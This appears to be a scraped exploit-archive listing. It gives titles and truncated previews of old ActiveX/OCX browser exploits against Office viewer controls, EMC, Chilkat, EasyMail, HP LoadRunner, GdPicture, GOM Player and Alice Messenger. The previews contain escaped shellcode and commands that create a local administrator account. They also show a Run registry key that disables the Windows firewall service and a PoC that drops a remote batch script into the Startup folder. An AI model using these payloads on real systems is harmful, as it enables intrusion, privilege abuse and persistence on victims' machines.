Excel Viewer OCX 3.2 - Remote File Execution Exploit

No description provided by source. HTML ---------------------------------------------------------- br Excel Viewer OCX 3.2 Remote File execution exploit br ---------------------------------------------------------- br -----------------------------------br By Mountassif Moad a.k.a Stack...

EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit

No description provided by source. !-- EMC multiple products KeyWorks KeyHelp Module keyhelp.ocx 1.2.312 remote buffer overflow exploit ie8 xp sp3 by Nine:Situations:Group::pyrokinesis site: http://retrogod.altervista.org/ tested products: EMC Captiva QuickScan Pro 4.6 sp1 EMC Documentum...

PowerPoint Viewer OCX 3.1 - Remote File Overwrite Exploit

No description provided by source. HTML ---------------------------------------------------------- br PowerPoint Viewer OCX v3.1 br ---------------------------------------------------------- br -----------------------------------br By Mountassif Moad a.k.a Stack...

Chilkat Socket activex 2.3.1.1 - Remote Arbitrary File Creation Exploit

No description provided by source. html titleChilkatSocket.DLL Arbitrary File Creation/titlebrbr body Company Name : Chilkat Software, Inc.brbr Vulnerable DLL : ChilkatSocket.DLLbrbr DLL's version : 2,3,1,1brbr Object Safety Report : br Report for Clsid: 474FCCCD-1B89-4D34-9E09-45807F23289Cbr...

EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow

EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow !-- Postcast Server Pro 3.0.61 / Quiksoft EasyMail SMTP Object emsmtp.dll 6.0.1 remote buffer overflow exploit ie6 / xp sp2 version passing more than 539 chars to SubmitToExpress method: EAX 00000400 ECX 0013DD24 ASCII...

EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability

No description provided by source. !-- Postcast Server Pro 3.0.61 / Quiksoft EasyMail SMTP Object emsmtp.dll 6.0.1 remote buffer overflow exploit ie6 / xp sp2 version passing more than 539 chars to SubmitToExpress method: EAX 00000400 ECX 0013DD24 ASCII "Error Creating File: AAAA ... EDX C0403FFF...

EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote BOF

Exploit for unknown platform in category remote exploits ====================================================================================== EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability...

HP LoadRunner 9.5 - Remote file creation (PoC)

HP LoadRunner 9.5 - Remote file creation PoC ' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params=""...

HP LoadRunner 9.5 remote file creation PoC

No description provided by source. !-- HP LoadRunner 9.5 Persits.XUpload.2 control XUpload.ocx MakeHttpRequest remote file creation poc IE 8 by Nine:Situations:Group::pyrokinesis CLSID: E87F6C8E-16C0-11D3-BEF7-009027438003 Progid: Persits.XUpload.2 Binary Path:...

Word Viewer OCX 3.2 - Remote Command Execution

Word Viewer OCX 3.2 - Remote Command Execution ---------------------------------------------------------- Word viewer OCX V 3.2 Remote File execution exploit ---------------------------------------------------------- ----------------------------------- By Mountassif Moad a.k.a Stack...

chilkat-create.txt

ChilkatSocket.DLL Arbitrary File Creation Company Name : Chilkat Software, Inc. Vulnerable DLL : ChilkatSocket.DLL DLL's version : 2,3,1,1 Object Safety Report : Report for Clsid: 474FCCCD-1B89-4D34-9E09-45807F23289C RegKey Safe for Script: Faux RegKey Safe for Init: Faux Implements IObjectSafety...

Chilkat Socket activex 2.3.1.1 Remote Arbitrary File Creation Exploit

No description provided by source. html titleChilkatSocket.DLL Arbitrary File Creation/titlebrbr body Company Name : Chilkat Software, Inc.brbr Vulnerable DLL : ChilkatSocket.DLLbrbr DLL's version : 2,3,1,1brbr Object Safety Report : br Report for Clsid: 474FCCCD-1B89-4D34-9E09-45807F23289Cbr...

GdPicture Pro 'gdpicture4s.ocx' ActiveX控件任意文件覆盖漏洞

BUGTRAQ ID:31504 CNCAN ID：CNCAN-2008100305 GdPicture Pro是一款支持多格式的图像管理软件。 GdPicture Pro包含的gdpicture4s.ocx ActiveX控件存在设计错误，远程攻击者可以利用漏洞以应用程序权限覆盖系统文件。 SaveAsPDF方法允许通过sFilePath参数建立和覆盖文件，通过使用其他参数，如sTitle，攻击者可以注入HTML代码，使用hcp://协议执行。GdPicturePro5.Imaging也存在此漏洞。 GdPicture GdPicture Pro GdPicture GdPicture...

gdpicture-exec.txt

var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add"; var outFile = "c:\windows\pchealth\helpctr\system\errors\badurl.htm"; var BMP = "\x42\x4d\x42\x00\x0...

ImageShack Toolbar 4.5.7 FileUploader Class Insecure Method PoC

No description provided by source. !-- ImageShack Toolbar 4.5.7 FileUploader Class ImageShackToolbar.dll insecure method poc This tool may allow a malicious web page to post arbitrary images on the web from a user hard drive. Images will be visible on ImageShack site, a way for an attacker to...

GOM Player 2.1.6.3499 - GomWeb3.dll 1.0.0.12 Remote Overflow

GOM Player 2.1.6.3499 - GomWeb3.dll 1.0.0.12 Remote Overflow //open calc.exe scode = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" &...

telecomitaly-reg.txt

group="HKEYLOCALMACHINE" section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run" key="sun-tzu" valType=1 'REGSZ value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess start= disabled & net stop SharedAccess & sc config...

Telecom Italy Alice Messenger Remote registry key manipulation Exploit

No description provided by source. !-- 04.50 20/08/2007 Telecom Italy Alice Messenger Hp.Revolution.RegistryManager.dll v.1 remote arbitrary registry key manipulation I mean this one: http://aiuto.alice.it/offerte/messenger/installazione.html this was 0day for a while, but ... who knows? the new...

Telecom Italy Alice Messenger - Remote Registry Key Manipulation

group="HKEYLOCALMACHINE" section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run" key="sun-tzu" valType=1 'REGSZ value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess start= disabled & net stop SharedAccess & sc config...

Telecom Italy Alice Messenger - Remote Registry Key Manipulation

Telecom Italy Alice Messenger - Remote Registry Key Manipulation group="HKEYLOCALMACHINE" section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run" key="sun-tzu" valType=1 'REGSZ value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config...